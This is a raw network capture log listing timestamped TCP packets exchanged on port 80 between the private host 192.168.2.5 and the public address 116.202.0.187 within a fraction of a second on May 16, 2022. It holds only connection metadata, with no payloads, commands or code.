May 16, 2022 10:29:38.007553101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007556915 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007570028 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007584095 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007586956 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007603884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007618904 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007626057 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007636070 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007651091 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007652998 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007668018 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007683039 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007689953 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007699966 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007715940 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007720947 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007731915 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007746935 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007761955 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007761955 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007777929 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007793903 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007798910 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007810116 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007827044 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007843018 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007855892 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007858038 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007875919 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007891893 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007906914 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007921934 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007936954 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007942915 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007952929 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007971048 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007980108 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007986069 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007998943 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.008017063 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.008045912 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.009943008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.009972095 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.009988070 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010003090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010019064 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010034084 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010037899 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010055065 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010071039 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010075092 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010087967 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010102987 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010118008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010133982 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010138988 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010150909 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010166883 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010174990 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010183096 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010200977 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010216951 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010221004 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010232925 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010248899 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010258913 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010265112 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010282040 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010288000 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010299921 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010314941 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010320902 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010332108 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010348082 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010354996 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010365009 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010382891 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010386944 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010400057 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010416031 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010432959 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010437965 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010449886 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010467052 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010477066 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010482073 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010499001 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010514975 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010525942 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010530949 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010549068 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010564089 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010564089 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010581017 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010596991 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010607004 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010612965 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010628939 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010643959 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010658026 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010665894 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010674953 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010690928 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010705948 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010719061 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010721922 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.010773897 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.010806084 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012329102 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012358904 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012375116 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012391090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012407064 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012423038 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012438059 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012438059 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012454987 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012486935 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012505054 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012507915 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012525082 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012535095 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012541056 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012557030 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012572050 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012581110 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012588024 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012603998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012619019 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012626886 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012635946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012650967 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012662888 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012666941 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012682915 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012698889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012706041 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012716055 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012732029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012742043 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012748003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012765884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012774944 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012780905 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012797117 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012813091 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012811899 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012828112 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012844086 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012851954 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012859106 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012875080 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012885094 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012892008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012913942 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012921095 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012932062 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012948990 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012958050 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012964010 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012980938 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.012993097 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.012996912 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013012886 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013025045 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013034105 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013050079 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013065100 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013067007 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013083935 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013098955 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013101101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013118029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013133049 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013134003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013150930 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013166904 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013173103 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013184071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013200998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013204098 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013219118 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013235092 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013245106 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013251066 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013267994 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013276100 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013283968 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013299942 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013310909 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013315916 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013334036 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013348103 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013350964 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013366938 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013380051 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013385057 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013401985 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013415098 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013417959 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013434887 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013448000 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013453007 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013468981 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013483047 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013485909 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013501883 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013518095 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013523102 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013535023 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013550043 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013566971 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013575077 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013583899 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013601065 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013606071 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013618946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013634920 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013650894 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013649940 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013667107 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013681889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013681889 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013699055 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013715029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013725996 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013731003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013746977 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013762951 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013766050 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013778925 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013796091 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013809919 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013819933 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013825893 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013838053 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013844013 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013859987 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013869047 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013876915 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013892889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013909101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013911963 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013926029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013941050 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013957024 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013962984 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.013974905 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.013991117 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014008045 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014010906 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014024019 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014041901 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014053106 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014058113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014074087 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014090061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014102936 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014106035 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014123917 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014139891 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014148951 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014156103 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014172077 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014188051 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014193058 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014204979 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014221907 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014229059 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014239073 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014246941 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014256001 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014271975 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014286995 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014292002 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014303923 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014319897 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014333963 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014349937 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014358044 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014364958 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014381886 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014398098 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014413118 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014420033 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014430046 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014446974 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014461994 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014467955 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014478922 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014494896 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014509916 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014514923 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014528036 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014543056 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014558077 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014561892 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014574051 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014590025 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014602900 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014605045 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014621973 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014636993 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014652967 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014653921 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014669895 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014686108 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014697075 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014702082 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014717102 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014733076 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014748096 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014754057 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014764071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014780998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014796972 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014806032 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014812946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014830112 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014843941 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014848948 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014862061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014877081 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014892101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014903069 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014909029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014925003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014940023 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014955997 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014955997 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014971972 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.014980078 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.014988899 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015003920 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015005112 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015022039 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015038013 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015053034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015055895 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015070915 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015086889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015101910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015115023 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.015117884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015135050 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015151024 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.015165091 CEST	49756	80	192.168.2.5	116.202.0.187
